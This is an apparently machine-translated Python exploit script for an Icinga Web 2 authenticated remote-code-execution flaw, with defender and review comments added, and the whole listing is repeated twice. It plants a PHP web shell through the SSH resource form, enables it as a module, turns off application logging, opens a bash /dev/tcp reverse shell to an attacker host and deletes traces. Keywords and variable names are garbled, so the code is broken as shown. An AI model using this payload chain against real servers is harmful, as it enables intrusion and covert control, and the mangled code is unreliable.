#!/usr/bin/env Python3
# Exploit title: Icinga Web 2.10 - Authenticated Remote Code Execution
# Date: 8/07/2023
# Exploit author: Dante Corona (aka CXDXNT)
# Software link: https://github.com/icinga/icingaweb2
# Vendor homepage: https://icinga.com/
# Software link: https://github.com/icinga/icingaweb2
# Version: 2.8.6, 2.9.6, 2.10
# Tested on Linux: Icinga Web 2 version 2.9.2
# CVE: CVE-2022-24715
# Based on: https://nvd.nist.gov/vuln/detail/cve-2022-24715
导入请求,argparse,re,随机,字符串
从Colorama进口,风格
# Produces the random token that the later steps use as the directory name
# under /dev/shm and as the request parameter name.
# Six letters are drawn from string.ascii_lowercase with random.choices.
# Defender note: the token differs on every run, so it is not a stable
# indicator; match on the fixed parts of the paths and URLs instead.
DEF LETTER_RANDOM():
letras=string.ascii_lowercase
targin_random=random.choices(letras,k=6)
# NOTE(review): the return line is truncated in this copy; presumably it
# joined the chosen letters into one string - confirm against the original.
返回''。
# Reads the five required command-line values with argparse and returns them:
# target URL, account name, password, and a callback IP address and port.
# A user name and password are mandatory, which matches the "authenticated"
# wording in the header: the flow needs a working Icinga Web 2 login.
# NOTE(review): the option strings and keyword names are mangled in this
# copy (machine translation), so the parser definition is not valid as shown.
def Users_url_password():
parser=argparse.argumentparser(description='描述'descriptióndetu程序。')
parser.add_argument(' - u',' - url',type=str,必需=true,help='insertar la url 3http://IP_VICTIMA')
parser.add_argument(' - u',' - user',type=str,必需=true,help='insertar usuario -u user')
parser.add_argument(' - p',' - password',type=str,必需=true,help,help='insertarcontastña-p密码')
parser.add_argument(' - i',' - '-ip',type=str,必需=true,help='insertar ip de atacante -i ip')
parser.add_argument(' - p',' - port',type=str,必需=true,help='insertar puerto de atacante -p port')
args=parser.parse_args()
url=args.url
用户=args.user
password=args.password
ip_attack=args.ip
port_attack=args.port
返回URL,用户,密码,IP_ATTACK,PORT_ATTACK
# Logs in to Icinga Web 2 and returns the authenticated requests session
# together with the CSRF token scraped from the login form.
# Flow: GET the login page, pull the csrftoken hidden field out with a regex,
# POST username/password/csrftoken with formuid 'form_login', then look for
# the welcome text in the response. A failed login or an invalid URL prints a
# message and exits with status 1.
# Defender note: every later request reuses this session, so the whole flow
# depends on valid credentials. Presumably the account also needs access to
# the /icingaweb2/config/ pages requested later - confirm against the
# advisory. Limiting which accounts hold configuration access narrows exposure.
DEF登录(URL,用户,密码):
TRY:
login_url=url +'/icingaweb2/authentication/login'
session=requests.session()
r=session.get(login_url)
csrf_regex=re.findall(r'name='csrftoken'value='([^']*)',r.text)[0]
data_post={'username':user,
'password'
assword,
'csrftoken':csrf_regex,
'formuid':'form_login',
'btn_submit':'login'
}
响应=session.post(login_url,data=data_post)
如果“欢迎来到Icinga网络!”响应.text:
打印(f'{fore.green} [*] {style.Reset_all}会话成功。')
r=session.get(login_url)
其他:
打印('[!]无法登录。')
出口(1)
# return session, csrf_regex  (left commented out by the author)
requests.exceptions.invalidurl:除外
print(f'{fore.yellow} [!] {style.Reset_all}错误URL :(')
出口(1)
返回会话,csrf_regex
# Creates an Icinga Web 2 resource of type 'ssh' whose form fields are used
# to place a PHP file on the server.
# - private_key: a PEM-framed RSA key block followed by one PHP line that
#   passes a request parameter (named by the random token) to system().
# - user: a run of relative path segments ending in
#   /dev/shm/<token>/run.php; name is 'shm/<token>'.
# NOTE(review): presumably the server writes the key material to a path
# derived from these fields, which would be the flaw tracked as
# CVE-2022-24715 in the header - confirm against the NVD entry linked there.
# Defender notes: look for POSTs to /icingaweb2/config/createresource with
# type=ssh where the user field contains path separators, for private_key
# values that carry content after the PEM end marker, and for .php files
# appearing under /dev/shm.
def upload_file(session,url,targin_random,csrf_regex):
webshell=f'''----开始RSA私钥-------------
miibogibaajbakj34gkxfhd90vcnlylinfex6ppy1tpf9cnzj4p4wgekls1pt8qu
kuprkfflfryc9aikjbjtwit+cqvjwyzvqwecaweaqjaijaijaijaijlixby2qpfos4dsmoem
O3QGY0T6Z09AIJTH+5OERV1BE+N4CDYJKFFGZDA88VQENZIRM0GRQ6A+HPGQMD2K
tqihakmsvzibnni7ot/osie2tmjly4swtqaevxyse2rbfdydaiebcuearqnmnbp7
9MXDXDF6AU0CN/RPBJB9QSHDCWZHGZUCIG2ES59Z8Z8UGGRDY+PXLQNWFOTADXD+UY
v/ow5t0q5gijaieyys4rai9yg8ewx/2w0t67zuvaw8eomb6biug0xcu+3okcibos
/5oipgotdsy7bcf9igpse8zggkzgyqvzen97ye00
-----结束RSA私钥------
?php系统($ _请求['%s']);
''%carame_random
# A fresh CSRF token is scraped from the resource form before the POST; the
# csrf_regex argument is not used in this function.
upload_url=url +'/icingaweb2/config/createresource'
r=session.get(upload_url)
csrf=re.findall(r'name='csrftoken'value='([^']*)',r.text)[0]
data_post={'type':'ssh',
'name':'shm/'+targin_random,
'user':f'./././././././././././././././././././dev/shm/{farem_random}/run.php',
'private_key':webshell,
'formuid':'form_config_resource',
'csrftoken':csrf,
'btn_submit':'Save更改'
}
upload_response=session.post(upload_url,data=data_post)
# The result is probed with a plain requests.get (no session cookie) and only
# the HTTP status is checked. Requests for .../dev/shm/<token>/run.php under
# the icingaweb2 lib path therefore show up in web-server access logs.
check=requests.get(url + f'/icingaweb2/lib/icinga/icinga-php-php-thirdparty/dev/shm/{farne_random}/run.php')
如果check.status_code!=200 :
print(f'{fore.yellow} [!] {style.Reset_all}错误上传文件。(')
出口(1)
其他:
print(f'{fore.green} [*] {style.reset_all}文件成功上传。')
# Re-submits the general configuration form (formuid 'form_config_general')
# with global_module_path set to '/dev/shm/', then posts to
# /icingaweb2/config/moduleenable with the random token as the module name.
# NOTE(review): presumably an enabled module's run.php is loaded by the
# application on later requests, which is why the file was placed at
# /dev/shm/<token>/run.php - confirm against the Icinga Web 2 module docs.
# Defender notes: a module path pointing at a world-writable location such as
# /dev/shm/ is a strong indicator and is worth alerting on. The same POST
# sets logging_log to 'none', so the application's own log presumably stops
# recording from here on; rely on web-server access logs and file integrity
# monitoring of the configuration instead.
def enable_module(session,url,targin_random):
# NOTE(review): the path below looks mangled in this copy; the form id
# suggests it is the general configuration page.
url_module=url+'/icingaweb2/config/enstry'
r_module=session.get(url_module)
csrf_module=re.findall(r'name='csrftoken'value='([^']*)'',r_module.text)[0]
# Two keys appear twice; in a Python dict literal the later value wins, so
# both show_* settings end up as '1'.
data_post={'global_show_stacktraces':'0',
'global_show_stacktraces':'1',
'global_show_application_state_messages':'0',
'global_show_application_state_messages':'1',
'global_module_path':'/dev/shm/',
'global_config_resource':'icingaweb2',
'logging_log':'none',
'themes_default':'icinga',
'themes_disabled':'0',
'authentication_default_domain':'',
'formuid':'form_config_general',
'csrftoken':f'{csrf_module}',
'btn_submit':'Save更改'
}
resul=session.post(url_module,data_post)
# ---- second request: enable the module named by the token ----
url_enable=url +'/icingaweb2/config/moduleenable'
r_enable=session.get(url_enable)
csrf_enable=re.findall(r'name='csrftoken'value='([^']*)'',r_enable.text)[0]
# NOTE(review): the next line is cut off in this copy (unterminated literal).
data_enable={'distindifier':f'{targe_random}','csrftoken':f'{csrf_enable}','btn_submit':'btn_submit
resul_enable=session.post(url_enable,data_enable)
# Uses the planted request parameter: GET requests to /icingaweb2/dashboard
# carry shell commands in the query string under the random token name.
# The first request echoes a bash /dev/tcp command line built from ip_attack
# and port_attack (presumably redirected into a file under /tmp - the line is
# mangled in this copy); the second runs that file with a 5 second timeout.
# Afterwards the /tmp file is removed and the module is disabled again.
# NOTE(review): indentation is lost, so it cannot be told from this copy
# which of the cleanup lines sit inside the except branch.
# Defender notes: the commands are query-string values of GET requests, so
# they are recorded in ordinary access logs; an outbound TCP connection from
# the web server to an unfamiliar host is the network-side signal. The cleanup
# shown removes only the /tmp file and disables the module. Nothing visible
# here deletes the created 'ssh' resource, the file under /dev/shm, or the
# changed global_module_path, so those remain as forensic artefacts.
def reverse_shell(session,url,ip_attack,port_attack,tarne_random):
reverse_url=url +'/icingaweb2/dashboard'
reverse_exe_one=reverse_url+f'?{farne_random}=echo+'bash%20-I%20%20%3E%26%20%20%2FDEV%2FTCP%2F {ip_attack}%2F {port_attack}%2f {port_attack}%200%200%3E%3E%261'+++/tmpp/tmpp/tm}}
reverse_exe_two=reverse_url + f'?{farne_random}=bash +/tmp/{farne_random}'
reverse_response_one=session.get(reverse_exe_one)
TRY:
reverse_response_two=session.get(reverse_exe_two,timeout=5)
# Bare except: any error, including the expected timeout, lands here.
Except:
print(f'{fore.red} [*] {style.reset_all}消除证据')
remove=session.get(reverse_url + f'?{farne_random}=rm +/tmp/{farne_random}')
disable_url=url +'/icingaweb2/config/moduledisable'
r_disable=session.get(disable_url)
csrf_disable=re.findall(r'name='csrftoken'value='([^']*)'',r_disable.text)[0]
data_disable={'distindifier':f'{targe_random}','csrftoken':csrf_disable,'btn_submit':'btn_submit'}
response_disable=session.post(disable_url,data=data_disable)
# Unfinished helper: it only builds the moduledisable URL and sends nothing.
# The entry point below never calls it; the disable request that is actually
# issued is written inline in reverse_shell.
def disable_module(session,url,targin_random):
url_disable=url +'/icingaweb2/config/moduledisable'
# Entry point: generate the token, read the command-line values, log in, then
# run the three steps in order (create resource, enable module, run command).
# NOTE(review): several names used here do not match the definitions above in
# this copy (the listing was machine-translated), so it does not run as shown.
# Defender note: the order gives the log sequence to correlate for one
# session - login, POST createresource, POST to the general config form, POST
# moduleenable, GETs to /icingaweb2/dashboard with an unusual parameter, POST
# moduledisable.
如果name=='__ -Main __':
targin_random=letter_random()
URL,用户,密码,IP_ATTACK,PORT_ATTACK=USER_URL_PASSWORD()
会话,csrf_regex=登录(url,用户,密码)
upload_file(session,url,tarne_random,csrf_regex)
enable_module(session,url,tarne_random)
reverse_shell(session,url,ip_attack,port_attack,tarne_random)
# Exploit title: Icinga Web 2.10 - Authenticated Remote Code Execution
# Date: 8/07/2023
# Exploit author: Dante Corona (aka CXDXNT)
# Software link: https://github.com/icinga/icingaweb2
# Vendor homepage: https://icinga.com/
# Software link: https://github.com/icinga/icingaweb2
# Version: 2.8.6, 2.9.6, 2.10
# Tested on Linux: Icinga Web 2 version 2.9.2
# CVE: CVE-2022-24715
# Based on: https://nvd.nist.gov/vuln/detail/cve-2022-24715
导入请求,argparse,re,随机,字符串
从Colorama进口,风格
# Produces the random token that the later steps use as the directory name
# under /dev/shm and as the request parameter name.
# Six letters are drawn from string.ascii_lowercase with random.choices.
# Defender note: the token differs on every run, so it is not a stable
# indicator; match on the fixed parts of the paths and URLs instead.
DEF LETTER_RANDOM():
letras=string.ascii_lowercase
targin_random=random.choices(letras,k=6)
# NOTE(review): the return line is truncated in this copy; presumably it
# joined the chosen letters into one string - confirm against the original.
返回''。
# Reads the five required command-line values with argparse and returns them:
# target URL, account name, password, and a callback IP address and port.
# A user name and password are mandatory, which matches the "authenticated"
# wording in the header: the flow needs a working Icinga Web 2 login.
# NOTE(review): the option strings and keyword names are mangled in this
# copy (machine translation), so the parser definition is not valid as shown.
def Users_url_password():
parser=argparse.argumentparser(description='描述'descriptióndetu程序。')
parser.add_argument(' - u',' - url',type=str,必需=true,help='insertar la url 3http://IP_VICTIMA')
parser.add_argument(' - u',' - user',type=str,必需=true,help='insertar usuario -u user')
parser.add_argument(' - p',' - password',type=str,必需=true,help,help='insertarcontastña-p密码')
parser.add_argument(' - i',' - '-ip',type=str,必需=true,help='insertar ip de atacante -i ip')
parser.add_argument(' - p',' - port',type=str,必需=true,help='insertar puerto de atacante -p port')
args=parser.parse_args()
url=args.url
用户=args.user
password=args.password
ip_attack=args.ip
port_attack=args.port
返回URL,用户,密码,IP_ATTACK,PORT_ATTACK
# Logs in to Icinga Web 2 and returns the authenticated requests session
# together with the CSRF token scraped from the login form.
# Flow: GET the login page, pull the csrftoken hidden field out with a regex,
# POST username/password/csrftoken with formuid 'form_login', then look for
# the welcome text in the response. A failed login or an invalid URL prints a
# message and exits with status 1.
# Defender note: every later request reuses this session, so the whole flow
# depends on valid credentials. Presumably the account also needs access to
# the /icingaweb2/config/ pages requested later - confirm against the
# advisory. Limiting which accounts hold configuration access narrows exposure.
DEF登录(URL,用户,密码):
TRY:
login_url=url +'/icingaweb2/authentication/login'
session=requests.session()
r=session.get(login_url)
csrf_regex=re.findall(r'name='csrftoken'value='([^']*)',r.text)[0]
data_post={'username':user,
'password'

'csrftoken':csrf_regex,
'formuid':'form_login',
'btn_submit':'login'
}
响应=session.post(login_url,data=data_post)
如果“欢迎来到Icinga网络!”响应.text:
打印(f'{fore.green} [*] {style.Reset_all}会话成功。')
r=session.get(login_url)
其他:
打印('[!]无法登录。')
出口(1)
# return session, csrf_regex  (left commented out by the author)
requests.exceptions.invalidurl:除外
print(f'{fore.yellow} [!] {style.Reset_all}错误URL :(')
出口(1)
返回会话,csrf_regex
# Creates an Icinga Web 2 resource of type 'ssh' whose form fields are used
# to place a PHP file on the server.
# - private_key: a PEM-framed RSA key block followed by one PHP line that
#   passes a request parameter (named by the random token) to system().
# - user: a run of relative path segments ending in
#   /dev/shm/<token>/run.php; name is 'shm/<token>'.
# NOTE(review): presumably the server writes the key material to a path
# derived from these fields, which would be the flaw tracked as
# CVE-2022-24715 in the header - confirm against the NVD entry linked there.
# Defender notes: look for POSTs to /icingaweb2/config/createresource with
# type=ssh where the user field contains path separators, for private_key
# values that carry content after the PEM end marker, and for .php files
# appearing under /dev/shm.
def upload_file(session,url,targin_random,csrf_regex):
webshell=f'''----开始RSA私钥-------------
miibogibaajbakj34gkxfhd90vcnlylinfex6ppy1tpf9cnzj4p4wgekls1pt8qu
kuprkfflfryc9aikjbjtwit+cqvjwyzvqwecaweaqjaijaijaijaijlixby2qpfos4dsmoem
O3QGY0T6Z09AIJTH+5OERV1BE+N4CDYJKFFGZDA88VQENZIRM0GRQ6A+HPGQMD2K
tqihakmsvzibnni7ot/osie2tmjly4swtqaevxyse2rbfdydaiebcuearqnmnbp7
9MXDXDF6AU0CN/RPBJB9QSHDCWZHGZUCIG2ES59Z8Z8UGGRDY+PXLQNWFOTADXD+UY
v/ow5t0q5gijaieyys4rai9yg8ewx/2w0t67zuvaw8eomb6biug0xcu+3okcibos
/5oipgotdsy7bcf9igpse8zggkzgyqvzen97ye00
-----结束RSA私钥------
?php系统($ _请求['%s']);
''%carame_random
# A fresh CSRF token is scraped from the resource form before the POST; the
# csrf_regex argument is not used in this function.
upload_url=url +'/icingaweb2/config/createresource'
r=session.get(upload_url)
csrf=re.findall(r'name='csrftoken'value='([^']*)',r.text)[0]
data_post={'type':'ssh',
'name':'shm/'+targin_random,
'user':f'./././././././././././././././././././dev/shm/{farem_random}/run.php',
'private_key':webshell,
'formuid':'form_config_resource',
'csrftoken':csrf,
'btn_submit':'Save更改'
}
upload_response=session.post(upload_url,data=data_post)
# The result is probed with a plain requests.get (no session cookie) and only
# the HTTP status is checked. Requests for .../dev/shm/<token>/run.php under
# the icingaweb2 lib path therefore show up in web-server access logs.
check=requests.get(url + f'/icingaweb2/lib/icinga/icinga-php-php-thirdparty/dev/shm/{farne_random}/run.php')
如果check.status_code!=200 :
print(f'{fore.yellow} [!] {style.Reset_all}错误上传文件。(')
出口(1)
其他:
print(f'{fore.green} [*] {style.reset_all}文件成功上传。')
# Re-submits the general configuration form (formuid 'form_config_general')
# with global_module_path set to '/dev/shm/', then posts to
# /icingaweb2/config/moduleenable with the random token as the module name.
# NOTE(review): presumably an enabled module's run.php is loaded by the
# application on later requests, which is why the file was placed at
# /dev/shm/<token>/run.php - confirm against the Icinga Web 2 module docs.
# Defender notes: a module path pointing at a world-writable location such as
# /dev/shm/ is a strong indicator and is worth alerting on. The same POST
# sets logging_log to 'none', so the application's own log presumably stops
# recording from here on; rely on web-server access logs and file integrity
# monitoring of the configuration instead.
def enable_module(session,url,targin_random):
# NOTE(review): the path below looks mangled in this copy; the form id
# suggests it is the general configuration page.
url_module=url+'/icingaweb2/config/enstry'
r_module=session.get(url_module)
csrf_module=re.findall(r'name='csrftoken'value='([^']*)'',r_module.text)[0]
# Two keys appear twice; in a Python dict literal the later value wins, so
# both show_* settings end up as '1'.
data_post={'global_show_stacktraces':'0',
'global_show_stacktraces':'1',
'global_show_application_state_messages':'0',
'global_show_application_state_messages':'1',
'global_module_path':'/dev/shm/',
'global_config_resource':'icingaweb2',
'logging_log':'none',
'themes_default':'icinga',
'themes_disabled':'0',
'authentication_default_domain':'',
'formuid':'form_config_general',
'csrftoken':f'{csrf_module}',
'btn_submit':'Save更改'
}
resul=session.post(url_module,data_post)
# ---- second request: enable the module named by the token ----
url_enable=url +'/icingaweb2/config/moduleenable'
r_enable=session.get(url_enable)
csrf_enable=re.findall(r'name='csrftoken'value='([^']*)'',r_enable.text)[0]
# NOTE(review): the next line is cut off in this copy (unterminated literal).
data_enable={'distindifier':f'{targe_random}','csrftoken':f'{csrf_enable}','btn_submit':'btn_submit
resul_enable=session.post(url_enable,data_enable)
# Uses the planted request parameter: GET requests to /icingaweb2/dashboard
# carry shell commands in the query string under the random token name.
# The first request echoes a bash /dev/tcp command line built from ip_attack
# and port_attack (presumably redirected into a file under /tmp - the line is
# mangled in this copy); the second runs that file with a 5 second timeout.
# Afterwards the /tmp file is removed and the module is disabled again.
# NOTE(review): indentation is lost, so it cannot be told from this copy
# which of the cleanup lines sit inside the except branch.
# Defender notes: the commands are query-string values of GET requests, so
# they are recorded in ordinary access logs; an outbound TCP connection from
# the web server to an unfamiliar host is the network-side signal. The cleanup
# shown removes only the /tmp file and disables the module. Nothing visible
# here deletes the created 'ssh' resource, the file under /dev/shm, or the
# changed global_module_path, so those remain as forensic artefacts.
def reverse_shell(session,url,ip_attack,port_attack,tarne_random):
reverse_url=url +'/icingaweb2/dashboard'
reverse_exe_one=reverse_url+f'?{farne_random}=echo+'bash%20-I%20%20%3E%26%20%20%2FDEV%2FTCP%2F {ip_attack}%2F {port_attack}%2f {port_attack}%200%200%3E%3E%261'+++/tmpp/tmpp/tm}}
reverse_exe_two=reverse_url + f'?{farne_random}=bash +/tmp/{farne_random}'
reverse_response_one=session.get(reverse_exe_one)
TRY:
reverse_response_two=session.get(reverse_exe_two,timeout=5)
# Bare except: any error, including the expected timeout, lands here.
Except:
print(f'{fore.red} [*] {style.reset_all}消除证据')
remove=session.get(reverse_url + f'?{farne_random}=rm +/tmp/{farne_random}')
disable_url=url +'/icingaweb2/config/moduledisable'
r_disable=session.get(disable_url)
csrf_disable=re.findall(r'name='csrftoken'value='([^']*)'',r_disable.text)[0]
data_disable={'distindifier':f'{targe_random}','csrftoken':csrf_disable,'btn_submit':'btn_submit'}
response_disable=session.post(disable_url,data=data_disable)
# Unfinished helper: it only builds the moduledisable URL and sends nothing.
# The entry point below never calls it; the disable request that is actually
# issued is written inline in reverse_shell.
def disable_module(session,url,targin_random):
url_disable=url +'/icingaweb2/config/moduledisable'
# Entry point: generate the token, read the command-line values, log in, then
# run the three steps in order (create resource, enable module, run command).
# NOTE(review): several names used here do not match the definitions above in
# this copy (the listing was machine-translated), so it does not run as shown.
# Defender note: the order gives the log sequence to correlate for one
# session - login, POST createresource, POST to the general config form, POST
# moduleenable, GETs to /icingaweb2/dashboard with an unusual parameter, POST
# moduledisable.
如果name=='__ -Main __':
targin_random=letter_random()
URL,用户,密码,IP_ATTACK,PORT_ATTACK=USER_URL_PASSWORD()
会话,csrf_regex=登录(url,用户,密码)
upload_file(session,url,tarne_random,csrf_regex)
enable_module(session,url,tarne_random)
reverse_shell(session,url,ip_attack,port_attack,tarne_random)